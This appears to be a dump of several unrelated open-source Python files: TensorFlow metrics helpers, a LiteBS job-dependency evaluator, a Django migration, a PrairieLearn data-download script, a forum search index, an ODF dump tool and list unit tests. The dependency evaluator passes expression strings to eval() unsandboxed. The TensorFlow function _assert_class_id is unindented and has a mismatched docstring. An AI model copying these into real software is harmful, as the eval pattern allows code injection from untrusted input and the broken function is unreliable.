  """Streaming mean of the indicator {label == class_id}."""
  matches_class = math_ops.equal(
      math_ops.to_int32(class_id), math_ops.to_int32(labels))
  indicator = array_ops.where(
      matches_class,
      array_ops.ones_like(labels),
      array_ops.zeros_like(labels))
  return metrics_lib.streaming_mean(indicator, weights=weights)
def _streaming_auc(predictions, labels, weights=None, class_id=None,
                   curve="ROC"):
  # pylint: disable=missing-docstring
  # Streaming AUC of `predictions` vs `labels`, optionally restricted to one
  # class column; `curve` selects ROC or PR.
  predictions = math_ops.to_float(predictions)
  if labels.dtype.base_dtype != dtypes.bool:
    # streaming_auc expects boolean labels; warn because the cast may hide
    # unintended label encodings.
    logging.warning("Casting %s labels to bool.", labels.dtype)
    labels = math_ops.cast(labels, dtypes.bool)
  weights = _float_weights_or_none(weights)
  if weights is not None:
    weights = weights_broadcast_ops.broadcast_weights(weights, predictions)
  if class_id is not None:
    # Restrict weights, predictions and labels to the requested class column.
    if weights is not None:
      weights = weights[:, class_id]
    predictions = predictions[:, class_id]
    labels = labels[:, class_id]
  return metrics_lib.streaming_auc(
      predictions, labels, weights=weights, curve=curve)
def _assert_class_id(class_id, num_classes=None):
"""Average label value for class `class_id`."""
if (class_id is None) or (class_id < 0):
raise ValueError("Invalid class_id %s." % class_id)
if num_classes is not None:
if num_classes < 2:
raise ValueError("Invalid num_classes %s." % num_classes)
if class_id >= num_classes:
raise ValueError("Invalid class_id %s." % class_id)
def _streaming_accuracy_at_threshold(predictions, labels, weights, threshold):
  """Streaming accuracy of `predictions >= threshold` against `labels`."""
  binarized_predictions = math_ops.to_float(
      math_ops.greater_equal(predictions, threshold))
  return metrics_lib.streaming_accuracy(
      predictions=binarized_predictions, labels=labels, weights=weights)
def _streaming_precision_at_threshold(predictions, labels, weights, threshold):
  """Streaming precision of `predictions` thresholded at `threshold`."""
  per_threshold_precision, update_op = (
      metrics_lib.streaming_precision_at_thresholds(
          predictions, labels=labels, thresholds=(threshold,),
          weights=_float_weights_or_none(weights)))
  # The metric returns one element per threshold; with a single threshold,
  # squeeze both tensors down to scalars.
  return (array_ops.squeeze(per_threshold_precision),
          array_ops.squeeze(update_op))
def _streaming_recall_at_threshold(predictions, labels, weights, threshold):
  """Streaming recall of `predictions` thresholded at `threshold`."""
  # Renamed from `precision_tensor`: this is a recall metric; the old local
  # name was copy-pasted from _streaming_precision_at_threshold.
  recall_tensor, update_op = metrics_lib.streaming_recall_at_thresholds(
      predictions, labels=labels, thresholds=(threshold,),
      weights=_float_weights_or_none(weights))
  # The metric returns one element per threshold; with a single threshold,
  # squeeze both tensors down to scalars.
  return array_ops.squeeze(recall_tensor), array_ops.squeeze(update_op)
def _classification_output_alternatives(head_name, problem_type,
                                        label_keys=None):
  """Creates a func to generate output alternatives for classification.

  Servo expects classes to be a string tensor, and have the same dimensions
  as the probabilities tensor. It should contain the labels of the corresponding
  entries in probabilities. This function creates a new classes tensor that
  satisfies these conditions and can be exported.

  Args:
    head_name: Name of the head.
    problem_type: `ProblemType`
    label_keys: Optional label keys

  Returns:
    A function to generate output alternatives.
  """
  def _create_output_alternatives(predictions):
    """Creates output alternative for the Head.

    Args:
      predictions: a dict of {tensor_name: Tensor}, where 'tensor_name' is a
        symbolic name for an output Tensor possibly but not necessarily taken
        from `PredictionKey`, and 'Tensor' is the corresponding output Tensor
        itself.

    Returns:
      `dict` of {submodel_name: (problem_type, {tensor_name: Tensor})}, where
      'submodel_name' is a submodel identifier that should be consistent across
      the pipeline (here likely taken from the head_name),
      'problem_type' is a `ProblemType`,
      'tensor_name' is a symbolic name for an output Tensor possibly but not
      necessarily taken from `PredictionKey`, and
      'Tensor' is the corresponding output Tensor itself.

    Raises:
      ValueError: if predictions does not have PredictionKey.PROBABILITIES key.
    """
    probabilities = predictions.get(prediction_key.PredictionKey.PROBABILITIES)
    if probabilities is None:
      raise ValueError("%s missing in predictions" %
                       prediction_key.PredictionKey.PROBABILITIES)
    with ops.name_scope(None, "_classification_output_alternatives",
                        (probabilities,)):
      batch_size = array_ops.shape(probabilities)[0]
      if label_keys:
        # User-supplied string labels: tile them to one row per batch entry.
        classes = array_ops.tile(
            input=array_ops.expand_dims(input=label_keys, axis=0),
            multiples=[batch_size, 1],
            name="classes_tensor")
      else:
        # No label keys: use stringified class indices [0, n) instead.
        n = array_ops.shape(probabilities)[1]
        classes = array_ops.tile(
            input=array_ops.expand_dims(input=math_ops.range(n), axis=0),
            multiples=[batch_size, 1])
        classes = string_ops.as_string(classes, name="classes_tensor")
    exported_predictions = {
        prediction_key.PredictionKey.PROBABILITIES: probabilities,
        prediction_key.PredictionKey.CLASSES: classes}
    return {head_name: (problem_type, exported_predictions)}
  return _create_output_alternatives
# Aliases
# TODO(zakaria): Remove these aliases, See b/34751732
# Underscore-prefixed aliases kept for backward compatibility with modules
# that still import the old private names.
_regression_head = regression_head
_poisson_regression_head = poisson_regression_head
_multi_class_head = multi_class_head
_binary_svm_head = binary_svm_head
_multi_label_head = multi_label_head
_multi_head = multi_head
_Head = Head
| vrv/tensorflow | tensorflow/contrib/learn/python/learn/estimators/head.py | Python | apache-2.0 | 78,330 |
#!/usr/bin/env python
#
# Copyright 2013 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = 'Simone Campagna'
__copyright__ = 'Copyright (c) 2013 Simone Campagna'
__license__ = 'Apache License Version 2.0'
__version__ = '1.0'
import ast
import collections
import sys

from .errors import *
from .litebs_types import Job
class DependencyError(LiteBS_Error):
    """Raised when a dependency expression fails validation or evaluation."""
    pass
class DependencySyntaxError(LiteBS_Error):
    """Raised when a dependency expression references an unknown job id."""
    pass
class DepNodeTransformer(ast.NodeTransformer):
    """Rewrites a dependency expression AST for validation.

    ``and`` is replaced by ``or`` and ``not`` is stripped, so that when the
    transformed expression is evaluated with every predicate returning False,
    no predicate call is skipped by short-circuit evaluation.
    """

    def visit_And(self, node):
        return ast.copy_location(ast.Or(), node)

    def visit_UnaryOp(self, node):
        # Visit children first so `and`/`not` nested inside this operand are
        # also rewritten (the original skipped them).
        self.generic_visit(node)
        if isinstance(node.op, ast.Not):
            return ast.copy_location(node.operand, node)
        # Bug fix: returning None from a NodeTransformer visitor *deletes*
        # the node, so unary ops other than `not` (e.g. unary minus) used to
        # be silently removed from the tree.
        return node
class LiteBS_DependencyHandler(object):
    """Evaluates, validates and inspects job dependency expressions.

    A dependency is a Python boolean expression over the DEP_* predicates
    (exposed without their prefix, e.g. ``terminated(3) and completed(4, 0)``).
    Three prepared global namespaces drive the three operations:

    - evaluation (``_e_globals``): names map to the real DEP_* checks;
    - validation (``_v_globals``): names map to wrappers that run the check
      for its side effects but always return False, so errors surface without
      short-circuiting;
    - extraction (``_d_globals``): names map to ``get_depended_job``, which
      records every referenced job id.
    """

    PREFIX = "DEP_"

    def __init__(self):
        prefix = self.PREFIX
        l_prefix = len(prefix)
        e_globals = {}
        v_globals = {}
        d_globals = {}

        def make_v_wrap(method):
            # Validation wrapper: execute the real check for its side effects
            # (unknown-job detection, argument errors) but report False.
            def v_wrap(*l_args, **kw_args):
                method(*l_args, **kw_args)
                return False
            return v_wrap

        for member_name in dir(self):
            if member_name.startswith(prefix):
                member = getattr(self, member_name)
                dep_function_name = member_name[l_prefix:]
                e_globals[dep_function_name] = member
                d_globals[dep_function_name] = self.get_depended_job
                # Bug fix: `collections.Callable` was removed in Python 3.10;
                # the builtin callable() is the portable equivalent.
                if callable(member):
                    v_globals[dep_function_name] = make_v_wrap(member)
                else:
                    v_globals[dep_function_name] = False
        self._e_globals = e_globals
        self._v_globals = v_globals
        self._d_globals = d_globals
        self._mutable = False

    def get_depended_job(self, job_id, *l_args, **kw_args):
        """Records `job_id`; stand-in predicate used by depended_job_ids()."""
        self._depended_job_ids.add(job_id)

    def get_job(self, job_id):
        """Returns the job for `job_id`, tracking whether it may still change.

        Raises:
            DependencySyntaxError: if the job id is unknown.
        """
        if job_id not in self._jobs_d:
            raise DependencySyntaxError("Job {0} does not exists".format(job_id))
        job = self._jobs_d[job_id]
        if job.status not in Job.COMPLETED_STATUS_SET:
            # A non-terminal job can still change status, so the value of the
            # whole expression is not final yet.
            self._mutable = True
        return job

    def DEP_terminated(self, job_id):
        """True if the job reached a terminal status (completed or deleted)."""
        return self.get_job(job_id).status in Job.COMPLETED_STATUS_SET

    def DEP_running(self, job_id):
        """True if the job is currently running."""
        return self.get_job(job_id).status == Job.STATUS_RUNNING

    def DEP_deleted(self, job_id):
        """True if the job was deleted."""
        return self.get_job(job_id).status == Job.STATUS_DELETED

    def DEP_completed(self, job_id, exit_code=None):
        """True if the job completed, optionally with the given exit code."""
        job = self.get_job(job_id)
        if job.status != Job.STATUS_COMPLETED:
            return False
        return exit_code is None or job.exit_code == exit_code

    def init(self, jobs_d):
        """Resets evaluation state against the given {job_id: job} mapping."""
        self._mutable = False
        self._jobs_d = jobs_d

    def evaluate(self, dependency, jobs_d):
        """Returns (bool value, mutable flag) for `dependency` over `jobs_d`."""
        self.init(jobs_d)
        value = eval(dependency, self._e_globals)
        return bool(value), self._mutable

    def validate(self, dependency, jobs_d):
        """Checks `dependency`; returns True or raises DependencyError.

        The expression is rewritten (``and`` -> ``or``, ``not`` stripped) so
        every predicate call is actually executed instead of being skipped by
        short-circuit evaluation.
        """
        self.init(jobs_d)
        self._mutable = False
        root = ast.parse(dependency, mode="eval")
        # The transformer mutates the tree in place. (The original code also
        # discarded the transformed root with a stray `t_root = root`.)
        DepNodeTransformer().visit(root)
        try:
            code = compile(root, "", "eval")
            eval(code, self._v_globals)
            return True
        except Exception:
            # Bug fix: `sys` is now a module-level import; previously it was
            # only imported inside the __main__ demo, so this handler raised
            # NameError when the module was used as a library.
            error_type, error, tb = sys.exc_info()
            raise DependencyError("{0}: {1}".format(error_type.__name__, error))

    def depended_job_ids(self, dependency, depended_job_ids):
        """Adds every job id referenced by `dependency` to the given set.

        NOTE(review): evaluation short-circuits, so ids appearing after a
        falsy `and` operand are not collected -- behavior preserved as-is.
        """
        self.init({})
        assert isinstance(depended_job_ids, set)
        self._depended_job_ids = depended_job_ids
        eval(dependency, self._d_globals)
        return self._depended_job_ids
if __name__ == "__main__":
    # Manual self-test / demo: exercises the handler against a fake job table.
    class Job(object):
        # Minimal stand-in for litebs_types.Job (shadows the imported class
        # inside this demo block only).
        STATUS_PENDING = 'P'
        STATUS_RUNNING = 'R'
        STATUS_STARTING = 'S'
        STATUS_EXITING = 'E'
        STATUS_HELD = 'H'
        STATUS_COMPLETED = 'C'
        STATUS_DELETED = 'D'
        COMPLETED_STATUS_SET = {STATUS_COMPLETED, STATUS_DELETED}
        def __init__(self, job_id, status, exit_code=None):
            self.job_id = job_id
            self.status = status
            self.exit_code = exit_code
        def __str__(self):
            return "{0}({1}, {2!r}, {3})".format(self.__class__.__name__, self.job_id, self.status, self.exit_code)
    jobs_l = []
    jobs_l.append(Job(1, Job.STATUS_PENDING))
    jobs_l.append(Job(2, Job.STATUS_RUNNING))
    jobs_l.append(Job(3, Job.STATUS_COMPLETED, 0))
    jobs_l.append(Job(4, Job.STATUS_COMPLETED, 17))
    jobs_l.append(Job(5, Job.STATUS_DELETED))
    jobs_l.append(Job(6, Job.STATUS_EXITING))
    for job in jobs_l:
        print(job)
    # Sample expressions; some reference unknown jobs (25, 60) on purpose to
    # exercise the error paths.
    dependencies = [
        "terminated(1) and completed(4)",
        "terminated(1) or completed(4)",
        "completed(4) or terminated(1)",
        "deleted(5) and completed(4)",
        "deleted(5) and completed(4, 13)",
        "deleted(5) and completed(4, 17)",
        "deleted(25) and completed(4, 17)",
        "completed(4, 13) and deleted(25)",
        "completed(4, 17) and deleted(25)",
        "completed(4, 17) or deleted(25)",
        "completed(4, 17) or not deleted(25)",
        "terminated(4) or not completed(60, 8)",
    ]
    d = LiteBS_DependencyHandler()
    #for dependency in dependencies:
    #    print repr(dependency)
    #    print
    import sys
    # Phase 1: collect the job ids referenced by each expression.
    print("Depended jobs:")
    depended_job_ids = set()
    for dependency in dependencies:
        print(dependency)
        try:
            d.depended_job_ids(dependency, depended_job_ids)
        except:
            error_type, error, tb = sys.exc_info()
            sys.stderr.write("ERR: {0}: {1}\n".format(error_type.__name__, error))
    print("Depended jobs=", depended_job_ids)
    input("...")
    jobs_d = dict((job.job_id, job) for job in jobs_l)
    # Phase 2: validation (errors are reported, not fatal).
    print("Validation:")
    for dependency in dependencies:
        try:
            d.validate(dependency, jobs_d)
        except:
            error_type, error, tb = sys.exc_info()
            sys.stderr.write("ERR: {0}: {1}\n".format(error_type.__name__, error))
    input("...")
    # Phase 3: evaluation against the fake job table.
    print("Evaluation:")
    for dependency in dependencies:
        try:
            value, mutable = d.evaluate(dependency, jobs_d)
        except DependencyError as error:
            print("{0}: ERR: {1}".format(dependency, error))
            continue
        except:
            error_type, error, tb = sys.exc_info()
            print("{0}: ERR: {1}: {2}".format(dependency, error_type.__name__, error))
            continue
        print("{0:<40s} -> value={1:5} mutable={2:5}".format(dependency, value, mutable))
| simone-campagna/LiteBS | lib/python/LiteBS/litebs_dependency_handler.py | Python | apache-2.0 | 7,541 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
class Migration(migrations.Migration):
    # Auto-generated by Django makemigrations; do not edit by hand.
    # NOTE(review): both `default` values below were captured at generation
    # time (a fixed timestamp byte string / naive datetime), which is what
    # makemigrations emits for callable-less datetime defaults.

    dependencies = [
        ('delivery', '0049_auto_20151219_1605'),
    ]

    operations = [
        migrations.AlterField(
            model_name='delivery',
            name='name',
            field=models.CharField(default=b'2016-05-05T21:44:40.887659', max_length=128, null=True, verbose_name='\u0418\u043c\u044f \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0438', blank=True),
        ),
        migrations.AlterField(
            model_name='mailaccount',
            name='auto_active_datetime',
            field=models.DateTimeField(default=datetime.datetime(2016, 5, 5, 21, 44, 40, 879821), verbose_name='\u0414\u0430\u0442\u0430 \u0437\u0430\u043a\u0440\u044b\u0442\u0438\u044f \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430'),
        ),
    ]
| AlexStarov/Shop | applications/delivery/migrations/0050_auto_20160505_2144.py | Python | apache-2.0 | 925 |
#!/usr/bin/env python
import os, time, requests, argparse, datetime
def main():
    # Parses command-line arguments, prepares the output directory and the
    # log file, then downloads the whole course instance.
    parser = argparse.ArgumentParser(description='Download all PrairieLearn course data as JSON via the API')
    parser.add_argument('-t', '--token', required=True, help='the API token from PrairieLearn')
    parser.add_argument('-i', '--course-instance-id', required=True, help='the course instance ID to download')
    parser.add_argument('-o', '--output-dir', required=True, help='the output directory to store JSON into (will be created if necessary)')
    parser.add_argument('-s', '--server', help='the server API address', default='https://prairielearn.engr.illinois.edu/pl/api/v1')
    args = parser.parse_args()

    print(f'ensure that {args.output_dir} directory exists...')
    os.makedirs(args.output_dir, exist_ok=True)
    print(f'successfully ensured directory existence')

    logfilename = os.path.join(args.output_dir, 'download_log.txt')
    print(f'opening log file {logfilename} ...')
    # The log file stays open for the entire download.
    with open(logfilename, 'wt') as logfile:
        print(f'successfully opened log file')
        download_course_instance(args, logfile)
def download_course_instance(args, logfile):
    # Downloads the gradebook, every assessment, each assessment's instances,
    # and each instance's submissions, logging progress and total time.
    log(logfile, f'starting download at {local_iso_time()} ...')
    start_time = time.time()

    course_instance_path = f'/course_instances/{args.course_instance_id}'
    # NOTE(review): `gradebook` and `submissions` are unused; the calls are
    # made for their file-saving side effect in get_and_save_json.
    gradebook = get_and_save_json(f'{course_instance_path}/gradebook', 'gradebook', args, logfile)
    assessments = get_and_save_json(f'{course_instance_path}/assessments', 'assessments', args, logfile)
    for assessment in assessments:
        assessment_instances = get_and_save_json(f'{course_instance_path}/assessments/{assessment["assessment_id"]}/assessment_instances', f'assessment_{assessment["assessment_id"]}_assessment_instances', args, logfile)
        for assessment_instance in assessment_instances:
            submissions = get_and_save_json(f'{course_instance_path}/assessment_instances/{assessment_instance["assessment_instance_id"]}/submissions', f'assessment_instance_{assessment_instance["assessment_instance_id"]}_submissions', args, logfile)

    end_time = time.time()
    log(logfile, f'successfully completed downloaded at {local_iso_time()}')
    log(logfile, f'total time elapsed: {end_time - start_time} seconds')
def get_and_save_json(path, filename, args, logfile):
    # Fetches `path` from the API server, saves the raw response body to
    # `<output-dir>/<filename>.json`, and returns the parsed JSON.
    url = args.server + path
    headers = {'Private-Token': args.token}

    log(logfile, f'downloading {url} ...')
    start_time = time.time()
    r = requests.get(url, headers=headers)
    if r.status_code != 200:
        raise Exception(f'Invalid status returned for {url}: {r.status_code}')
    end_time = time.time()
    # NOTE(review): assumes the server always sends Content-Length; a chunked
    # response would raise KeyError here -- confirm against the API.
    log(logfile, f'successfully downloaded {r.headers["content-length"]} bytes in {end_time - start_time} seconds')

    full_filename = os.path.join(args.output_dir, filename + '.json')
    log(logfile, f'saving data to {full_filename} ...')
    with open(full_filename, 'wt') as out_f:
        out_f.write(r.text)
    log(logfile, f'successfully wrote data')

    log(logfile, f'parsing data as JSON...')
    data = r.json()
    log(logfile, f'successfully parsed JSON')
    return data
def log(logfile, message):
    """Appends `message` to the log file (flushed) and echoes it to stdout."""
    line = message + '\n'
    logfile.write(line)
    # Flush so progress survives an interrupted download.
    logfile.flush()
    print(message)
def local_iso_time():
    """Returns the current local time as an ISO-8601 string with UTC offset."""
    now_utc = datetime.datetime.now(datetime.timezone.utc)
    # astimezone() with no argument converts to the local timezone.
    return now_utc.astimezone().isoformat()
# Script entry point.
if __name__ == '__main__':
    main()
| rbessick5/PrairieLearn | tools/api_download.py | Python | agpl-3.0 | 3,432 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from haystack import indexes
from machina.core.db.models import get_model
Post = get_model('forum_conversation', 'Post')
class PostIndex(indexes.SearchIndex, indexes.Indexable):
    """
    Defines the data stored in the Post indexes.
    """
    # Main searchable document; content is rendered from the template below.
    text = indexes.CharField(
        document=True, use_template=True, template_name='forum_search/post_text.txt')

    # Poster id may be null (see prepare_poster_name for the fallback).
    poster = indexes.IntegerField(model_attr='poster_id', null=True)
    poster_name = indexes.CharField()

    # Denormalized forum/topic fields used for filtering and display.
    forum = indexes.IntegerField(model_attr='topic__forum_id')
    forum_slug = indexes.CharField()
    forum_name = indexes.CharField()

    topic = indexes.IntegerField(model_attr='topic_id')
    topic_slug = indexes.CharField()
    topic_subject = indexes.CharField()

    created = indexes.DateTimeField(model_attr='created')
    updated = indexes.DateTimeField(model_attr='updated')

    def get_model(self):
        return Post

    def prepare_poster_name(self, obj):
        # Fall back to the free-text username stored on the post when no
        # poster account is attached.
        return obj.poster.username if obj.poster else obj.username

    def prepare_forum_slug(self, obj):
        return obj.topic.forum.slug

    def prepare_forum_name(self, obj):
        return obj.topic.forum.name

    def prepare_topic_slug(self, obj):
        return obj.topic.slug

    def prepare_topic_subject(self, obj):
        return obj.topic.subject

    def index_queryset(self, using=None):
        # Unapproved posts are kept out of the search index.
        return Post.objects.all().exclude(approved=False)

    def read_queryset(self, using=None):
        # select_related avoids per-result queries when rendering hits.
        return Post.objects.all().exclude(approved=False).select_related('topic', 'poster')
| franga2000/django-machina | machina/apps/forum_search/search_indexes.py | Python | bsd-3-clause | 1,614 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# Copyright (c) 2009 Ars Aperta, Itaapy, Pierlis, Talend.
#
# Authors: Hervé Cauwelier <herve@itaapy.com>
# David Versmisse <david.versmisse@itaapy.com>
#
# This file is part of Lpod (see: http://lpod-project.org).
# Lpod is free software; you can redistribute it and/or modify it under
# the terms of either:
#
# a) the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option)
# any later version.
# Lpod is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Lpod. If not, see <http://www.gnu.org/licenses/>.
#
# b) the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Import from the standard library
from optparse import OptionParser
from os import mkdir, makedirs
from os.path import join, exists
from shutil import rmtree
from sys import exit, stdout
# Import from lpod
from lpod import __version__
from lpod.document import odf_get_document
from lpod.scriptutils import add_option_output, printerr
from lpod.scriptutils import check_target_directory
def clean_filename(filename):
    """Returns `filename` with every character outside [a-zA-Z0-9.-_@]
    replaced by an underscore.

    NOTE(review): Python 2 code -- `filename` is encoded to a UTF-8 byte
    string first, so multi-byte characters are filtered byte by byte.
    """
    filename = filename.encode('utf-8')
    allowed_characters = set([u'.', u'-', u'_', u'@'])
    result = []
    for c in filename:
        if c not in allowed_characters and not c.isalnum():
            result.append('_')
        else:
            result.append(c)
    return ''.join(result)
def dump(txt, to_file):
    """Writes `txt` to `to_file`, encoded with the file's declared encoding
    when available, falling back to UTF-8 otherwise (Python 2 semantics)."""
    try:
        # Plain file objects have no `encoding` attribute; stdout may.
        encoding = to_file.encoding if to_file.encoding else 'utf-8'
    except AttributeError:
        encoding = 'utf-8'
    txt = txt.encode(encoding)
    to_file.write(txt)
def dump_pictures(document, target):
    """Extracts every part under Pictures/ from `document` into the `target`
    directory, creating `target`/Pictures on first use.

    Bug fix: the original never closed the output file handles, leaking one
    open file per picture; each handle is now closed explicitly.
    """
    for part_name in document.get_parts():
        if part_name.startswith('Pictures/'):
            path = join(target, "Pictures")
            if not exists(path):
                mkdir(path)
            data = document.get_part(part_name)
            encoding = stdout.encoding if stdout.encoding else 'utf-8'
            path = join(target, part_name.encode(encoding))
            to_file = open(path, 'wb')
            try:
                to_file.write(data)
            finally:
                to_file.close()
def spreadsheet_to_stdout(document):
    """Prints each table of a spreadsheet `document` to stdout as CSV, with a
    blank line between tables."""
    encoding = stdout.encoding
    if encoding is None:
        encoding = 'utf-8'
    body = document.get_body()
    for table in body.get_table_list():
        # Drop trailing empty rows/columns before exporting.
        table.rstrip_table(aggressive=True)
        table.export_to_csv(stdout, encoding=encoding)
        stdout.write("\n")
        stdout.flush()
def spreadsheet_to_csv(document, target):
    """Writes each table of a spreadsheet `document` to `target` as a
    `<sanitized table name>.csv` file."""
    body = document.get_body()
    for table in body.get_table_list():
        name = table.get_table_name()
        # Sanitize the table name so it is safe as a filename.
        filename = clean_filename(name) + '.csv'
        csv_file = open(join(target, filename), 'wb')
        # Drop trailing empty rows/columns before exporting.
        table.rstrip_table(aggressive=True)
        table.export_to_csv(csv_file)
        csv_file.close()
if __name__ == '__main__':
    # Options initialisation
    usage = ('%prog [--styles] [--meta] [--no-content] [--rst] <file>\n'
             '       %prog -o <DIR> [--rst] <file>')
    description = ("Dump text from an OpenDocument file to the standard "
                   "output, optionally styles and meta (and the Pictures/* in "
                   '"-o <DIR>" mode)')
    parser = OptionParser(usage, version=__version__,
                          description=description)
    # --meta
    parser.add_option('-m', '--meta', action='store_true', default=False,
                      help='dump metadata to stdout')
    # --styles
    parser.add_option('-s', '--styles', action='store_true', default=False,
                      help='dump styles to stdout')
    # --no-content
    parser.add_option('-n', '--no-content', action='store_true',
                      default=False, help='do not dump content to stdout')
    # --rst
    parser.add_option('-r', '--rst', action='store_true', default=False,
                      help='Dump the content file with a reST syntax')
    # --output
    add_option_output(parser, metavar="DIR")
    # Parse !
    options, args = parser.parse_args()
    # Container
    if len(args) != 1:
        parser.print_help()
        exit(1)
    container_url = args[0]
    # Open it!
    document = odf_get_document(container_url)
    doc_type = document.get_type()
    if options.output:
        # Directory mode: recreate `target` from scratch, then write meta,
        # styles and pictures into it.
        target = options.output
        check_target_directory(target)
        if exists(target):
            rmtree(target)
        makedirs(target)
        # Meta
        # NOTE(review): these handles are never closed; get_formated_meta is
        # the (misspelled) lpod API name.
        to_file = open(join(target, 'meta.txt'), 'wb')
        dump(document.get_formated_meta(), to_file)
        # Styles
        to_file = open(join(target, 'styles.txt'), 'wb')
        dump(document.show_styles(), to_file)
        # Pictures
        dump_pictures(document, target)
    else:
        # Stdout mode: meta and styles are only printed on request.
        if options.meta:
            dump(document.get_formated_meta(), stdout)
        if options.styles:
            dump(document.show_styles(), stdout)
    # text
    if doc_type in ('text', 'text-template', 'presentation',
                    'presentation-template'):
        if options.output:
            to_file = open(join(target, 'content.txt'), 'wb')
            dump(document.get_formatted_text(rst_mode=options.rst), to_file)
        elif not options.no_content:
            dump(document.get_formatted_text(rst_mode=options.rst), stdout)
    # spreadsheet
    elif doc_type in ('spreadsheet', 'spreadsheet-template'):
        if options.output:
            spreadsheet_to_csv(document, target)
        elif not options.no_content:
            spreadsheet_to_stdout(document)
    else:
        printerr("The OpenDocument format", doc_type, "is not supported yet.")
        exit(1)
| uliss/quneiform | tests/py/lpod/scripts/lpod-show.py | Python | gpl-3.0 | 5,959 |
# This file taken from Python, licensed under the Python License Agreement
from __future__ import print_function
"""
Tests common to list and UserList.UserList
"""
import sys
import os
from blist.test import unittest
from blist.test import test_support
from blist.test import seq_tests
from decimal import Decimal
def CmpToKey(mycmp):
    'Convert a cmp= function into a key= function'
    class K(object):
        def __init__(self, wrapped):
            self.obj = wrapped
        def __lt__(self, other):
            # sort() only needs "less than"; mycmp returns -1/0/1.
            return mycmp(self.obj, other.obj) == -1
    return K
class CommonTest(seq_tests.CommonTest):
    def test_init(self):
        """__init__ accepts an optional iterable and resets existing state."""
        # Iterable arg is optional
        self.assertEqual(self.type2test([]), self.type2test())

        # Init clears previous values
        a = self.type2test([1, 2, 3])
        a.__init__()
        self.assertEqual(a, self.type2test([]))

        # Init overwrites previous values
        a = self.type2test([1, 2, 3])
        a.__init__([4, 5, 6])
        self.assertEqual(a, self.type2test([4, 5, 6]))

        # Mutables always return a new object
        b = self.type2test(a)
        self.assertNotEqual(id(a), id(b))
        self.assertEqual(a, b)
    def test_repr(self):
        """str/repr use the 'blist([...])' form; self-reference renders [...]."""
        l0 = []
        l2 = [0, 1, 2]
        a0 = self.type2test(l0)
        a2 = self.type2test(l2)

        self.assertEqual(str(a0), 'blist(%s)' % str(l0))
        self.assertEqual(repr(a0), 'blist(%s)' % repr(l0))
        self.assertEqual(repr(a2), 'blist(%s)' % repr(l2))
        self.assertEqual(str(a2), "blist([0, 1, 2])")
        self.assertEqual(repr(a2), "blist([0, 1, 2])")

        # A list that contains itself must not recurse infinitely.
        a2.append(a2)
        a2.append(3)
        self.assertEqual(str(a2), "blist([0, 1, 2, [...], 3])")
        self.assertEqual(repr(a2), "blist([0, 1, 2, [...], 3])")
    def test_print(self):
        """str(d) written to a file reads back equal to repr(d), even for a
        large self-referential list."""
        d = self.type2test(range(200))
        d.append(d)
        d.extend(range(200,400))
        d.append(d)
        d.append(400)
        try:
            fo = open(test_support.TESTFN, "w")
            fo.write(str(d))
            fo.close()
            fo = open(test_support.TESTFN, "r")
            self.assertEqual(fo.read(), repr(d))
        finally:
            # Always close the last handle and remove the scratch file.
            fo.close()
            os.remove(test_support.TESTFN)
    def test_set_subscript(self):
        """Extended-slice assignment validates step, value type and length."""
        a = self.type2test(list(range(20)))
        # Zero step is invalid.
        self.assertRaises(ValueError, a.__setitem__, slice(0, 10, 0), [1,2,3])
        # The assigned value must be iterable.
        self.assertRaises(TypeError, a.__setitem__, slice(0, 10), 1)
        # Extended slices require a value of matching length.
        self.assertRaises(ValueError, a.__setitem__, slice(0, 10, 2), [1,2])
        # Non-integer, non-slice index raises TypeError.
        self.assertRaises(TypeError, a.__getitem__, 'x', 1)
        a[slice(2,10,3)] = [1,2,3]
        self.assertEqual(a, self.type2test([0, 1, 1, 3, 4, 2, 6, 7, 3,
                                            9, 10, 11, 12, 13, 14, 15,
                                            16, 17, 18, 19]))
def test_reversed(self):
a = self.type2test(list(range(20)))
r = reversed(a)
self.assertEqual(list(r), self.type2test(list(range(19, -1, -1))))
if hasattr(r, '__next__'): # pragma: no cover
self.assertRaises(StopIteration, r.__next__)
else: # pragma: no cover
self.assertRaises(StopIteration, r.next)
self.assertEqual(list(reversed(self.type2test())),
self.type2test())
def test_setitem(self):
a = self.type2test([0, 1])
a[0] = 0
a[1] = 100
self.assertEqual(a, self.type2test([0, 100]))
a[-1] = 200
self.assertEqual(a, self.type2test([0, 200]))
a[-2] = 100
self.assertEqual(a, self.type2test([100, 200]))
self.assertRaises(IndexError, a.__setitem__, -3, 200)
self.assertRaises(IndexError, a.__setitem__, 2, 200)
a = self.type2test([])
self.assertRaises(IndexError, a.__setitem__, 0, 200)
self.assertRaises(IndexError, a.__setitem__, -1, 200)
self.assertRaises(TypeError, a.__setitem__)
a = self.type2test([0,1,2,3,4])
a[0] = 1
a[1] = 2
a[2] = 3
self.assertEqual(a, self.type2test([1,2,3,3,4]))
a[0] = 5
a[1] = 6
a[2] = 7
self.assertEqual(a, self.type2test([5,6,7,3,4]))
a[-2] = 88
a[-1] = 99
self.assertEqual(a, self.type2test([5,6,7,88,99]))
a[-2] = 8
a[-1] = 9
self.assertEqual(a, self.type2test([5,6,7,8,9]))
def test_delitem(self):
a = self.type2test([0, 1])
del a[1]
self.assertEqual(a, [0])
del a[0]
self.assertEqual(a, [])
a = self.type2test([0, 1])
del a[-2]
self.assertEqual(a, [1])
del a[-1]
self.assertEqual(a, [])
a = self.type2test([0, 1])
self.assertRaises(IndexError, a.__delitem__, -3)
self.assertRaises(IndexError, a.__delitem__, 2)
a = self.type2test([])
